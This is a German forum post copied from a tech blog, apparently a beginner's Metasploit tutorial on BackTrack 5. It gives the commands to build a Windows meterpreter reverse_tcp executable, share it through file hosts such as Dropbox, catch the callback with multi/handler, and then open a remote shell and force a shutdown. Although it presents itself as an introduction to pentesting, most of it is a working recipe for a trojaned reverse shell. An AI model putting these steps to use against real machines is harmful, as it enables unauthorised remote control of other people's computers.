Ankündigung

Einklappen
Keine Ankündigung bisher.

Mit Metasploit Windows - Sicherheitslücken finden

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Information: Mit Metasploit Windows - Sicherheitslücken finden

    Windows mit Metasploit exploiten

    Hallo zusammen und herzlich willkommen zum ersten Tutorial über Backtrack. Falls Ihr nicht wisst, was Backtrack ist, lest es doch hier kurz nach:


    Backtrack – Was ist das?


    In unserem ersten Tutorial geht es darum, die Folgen einer ausgeschalteten Firewall, eines Nicht - Updaten oder eines Mangel an Antivirus aufzuzeigen.

    Es geht nicht darum, sich in Windows einzuhacken!

    Wir generieren ein .exe – File (dass aber ausser dem Exploit nichts kann), welcher bei Ausführung uns die Möglichkeit gibt, eine Windows – Shell auszuführen (CMD).

    Schritt 1 – Vorbereitung

    Wir benutzen BackTrack 5 R2 als ROOT – User und öffnen ein Terminal. Dort erstellen wir unsere Exe – Datei mit folgender Kommandozeile:

    msfpayload windows/meterpreter/reverse_tcp lhost=Die IP des eigenen PC’s lport=4444 x > ExeFile.exe


    Um die IP herauszufinden, könnt ihr bei einem anderen Terminal „ifconfig“ eingeben und unter eth0 die Adresse die nach „inet addr:“ steht eingeben.


    Das dauert eine Weile, aber sobald Ihr folgendes seht, könnt Ihr weitermachen:



    Created by msfpayload (www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options: {"lhost"=>"DeineIP", "lport"=>"4444"}



    Um die IP herauszufinden, könnt ihr bei einem anderen Terminal „ifconfig“ eingeben und unter eth0 die Adresse die nach „inet addr:“ steht eingeben.
    Das Exe – File müsst Ihr zum Download freigeben (zB über DropBox, uploadet.to und ähnliches).


    Schritt 2 – den Exploit starten

    Öffnet ein neues Terminal und gebt „msfconsole“ ein und wartet solange bis ihr „msf >“ seht.
    Jetzt müsst Ihr den Befehl „use multi/handler“ eingeben.

    Ihr solltet nun ein „msf exploit(handler) >“ sehen.
    Jetzt wählen wir „unseren“ Exploit mit „set payload windows/meterpreter/reverse_tcp“ gefolgt von „set lhost DeineIP“ und „set lport 4444“(Je auf einer eigenen Kommandozeile).
    Fertig.


    Um den Exploit zu starten müsst Ihr jetzt einfach „exploit eingeben“ und nun wartet Ihr.
    Geht mit einem anderem PC (Windows) und ladet eure Exe – Datei runter. (Funktioniert auch mit einer virtuellen Maschine)
    Führt sie auf eurem Windows PC aus und wartet bis ihr „meterpreter“ seht.




    Schritt 3 – Den Exploit ausnutzen

    Nun könnt ihr „shell“ eingeben – voila ihr seid drinnen.
    Einfache Befehle:

    Notepad öffnen:

    cd C:\
    notepad.exe"/"notepad


    Messagebox öffnen:

    Msg * " Deine Nachricht "


    PC runterfahren:

    shutdown -t 0 (damit keine Möglichkeit zum Abbruch besteht)



    Beachtet bitte:

    Funktioniert nur auf nicht gepatchte Versionen von Windows, wenn keine Firewall aktiviert ist (oder Microsoft Security Essentials oder ähnliches...)


    Dieses Tutorial ist nicht für illegale Zwecke gedacht, sondern um einen Einstieg im Bereich der IT – Security / PenTesting zu erleichtern.

    Quelle: Ma - Kun's Tech - Blog
    Gruss Ma-kun
Lädt...
X